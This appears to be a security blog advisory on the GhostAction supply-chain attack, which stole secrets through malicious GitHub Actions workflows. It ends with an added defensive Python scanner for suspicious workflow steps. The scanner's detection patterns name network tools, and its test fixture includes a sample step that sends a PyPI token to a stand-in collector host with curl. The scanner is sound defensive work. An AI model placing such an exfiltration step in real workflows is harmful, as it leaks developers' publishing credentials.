September 12, 2025
By esentry team

GhostAction Supply Chain Attack – Developers and Security Teams at Risk

Secrets Stolen, Projects Exposed
A new large-scale supply chain attack, dubbed GhostAction, is targeting GitHub repositories through malicious workflow files disguised as automation scripts. This campaign has already compromised over 817 repositories, stealing more than 3,000 secrets, including GitHub, DockerHub, npm, and PyPI credentials.

Timeline of Events

  • September 2, 2025 – A suspicious workflow file was committed to the Fast UUID project, containing code to exfiltrate CI/CD secrets.
  • September 5, 2025 – Researchers confirmed the compromise; PyPI tokens were stolen, and the repository was locked to prevent further abuse.
  • Following Days – Investigation uncovered a broader GhostAction campaign impacting hundreds of developers and repositories across multiple languages and ecosystems.

The Scale of Compromise

GhostAction is one of the largest workflow compromises ever uncovered on GitHub. Investigators confirmed that:

  • 327 developers were directly impacted, many of whom maintain widely used libraries.
  • 817 repositories were tampered with, spanning Python, JavaScript, Rust, and Go.
  • Over 3,325 secrets were exfiltrated, including GitHub, DockerHub, npm, and PyPI tokens.

This scale means the compromise extends beyond individual projects. It poses a systemic risk to the software supply chain:

  • A single poisoned package could cascade into thousands of downstream applications.
  • Cloud environments and databases linked to stolen tokens have already seen intrusion attempts.
  • Entire SDK portfolios for some companies were affected, magnifying potential business impact.

Who Should Be Concerned?

  • Developers & Maintainers – Your GitHub Actions workflows may have been tampered with.
  • DevOps Teams – Compromised CI/CD tokens put your automation pipelines and deployments at risk.
  • Engineering Leaders – Stolen credentials open doors to package poisoning, data theft, and intrusion into cloud environments.

What You Need To Do Now

  1. Audit workflows – Review GitHub Actions and other CI/CD workflows for unauthorized or suspicious changes.
  2. Rotate credentials immediately – Replace all npm, PyPI, DockerHub, and GitHub tokens in case of exposure.
  3. Apply GitGuardian’s IOCs – Compare workflow names, commit messages, and server indicators to your environment.
  4. Strengthen monitoring – Implement continuous monitoring of repositories and pipelines for unusual commits or automation scripts.
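One way to start the workflow audit in step 1, as an added example that is not part of the original advisory and not GitGuardian's tooling: a dependency-free Python script that splits each GitHub Actions workflow file into steps and flags any step that both references repository secrets and invokes a network tool against a host outside an allowlist, or that serialises the entire secrets context. The allowlist, the regular expressions and the two embedded workflow samples are constructed assumptions; tune the allowlist to the registries your pipelines legitimately publish to.

```python
"""Heuristic audit of GitHub Actions workflows for secret-exfiltration patterns.

Added example (not the advisory's own code). Run from a repository root:
    python3 audit_workflows.py
It reads .github/workflows/*.yml and prints a finding per suspicious step.
"""
import re
import sys
from pathlib import Path

# Hosts a job may legitimately contact while holding credentials (assumption: adjust per org).
ALLOWED_HOSTS = {
    "github.com", "api.github.com", "uploads.github.com",
    "registry.npmjs.org", "upload.pypi.org", "pypi.org",
    "index.docker.io", "registry-1.docker.io", "ghcr.io",
}

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
TOJSON_SECRETS = re.compile(r"toJSON\(\s*secrets\s*\)")       # dumps every secret at once
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
NET_TOOL = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest|requests\.(?:post|put|get))\b")
STEP_START = re.compile(r"^\s*-\s+[\w-]+:")                     # '- name:', '- uses:', '- run:' ...


def split_steps(text):
    """Split workflow text into (first_line_number, block_text) chunks, one per step.

    Everything before the first step (top-level env, triggers) forms its own block,
    so secrets exposed at job or workflow level are still examined.
    """
    blocks, start, buf = [], 1, []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if STEP_START.match(line) and buf:
            blocks.append((start, "\n".join(buf)))
            start, buf = lineno, []
        buf.append(line)
    if buf:
        blocks.append((start, "\n".join(buf)))
    return blocks


def scan_workflow(text):
    """Return a list of findings; each is a dict with line, reason, secrets and hosts."""
    findings = []
    for start, block in split_steps(text):
        secrets = sorted(set(SECRET_REF.findall(block)))
        hosts = sorted({h.lower() for h in URL_RE.findall(block)} - ALLOWED_HOSTS)
        if TOJSON_SECRETS.search(block):
            findings.append({"line": start, "reason": "bulk-secret-dump",
                             "secrets": secrets, "hosts": hosts})
        elif secrets and hosts and NET_TOOL.search(block):
            findings.append({"line": start, "reason": "secrets-and-outbound-request",
                             "secrets": secrets, "hosts": hosts})
    return findings


def scan_directory(root):
    """Scan every workflow under <root>/.github/workflows; returns {path: findings}."""
    results = {}
    for path in sorted(Path(root, ".github", "workflows").glob("*.y*ml")):
        hits = scan_workflow(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            results[str(path)] = hits
    return results


# Constructed samples (not real project workflows) used for a self-check below.
BENIGN_WORKFLOW = """
name: publish
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Publish package
        run: npm publish
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
"""

SUSPICIOUS_WORKFLOW = """
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Upload build telemetry
        run: curl -s -X POST --data "$PYPI_TOKEN" https://collector.example.invalid/collect
        env:
          PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }}
          DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }}
"""


def main():
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    results = scan_directory(root)
    for path, hits in results.items():
        for h in hits:
            print(f"{path}:{h['line']} {h['reason']} secrets={h['secrets']} hosts={h['hosts']}")
    if not results:
        print("no suspicious workflow steps found under", root)


if __name__ == "__main__":
    main()
```

The scanner is a triage aid, not proof of compromise: a step that posts a token to an unlisted host should be read alongside the commit that introduced it (`git log -p -- .github/workflows/` shows who changed each file and when), and any secret it references should be treated as exposed and rotated as in step 2.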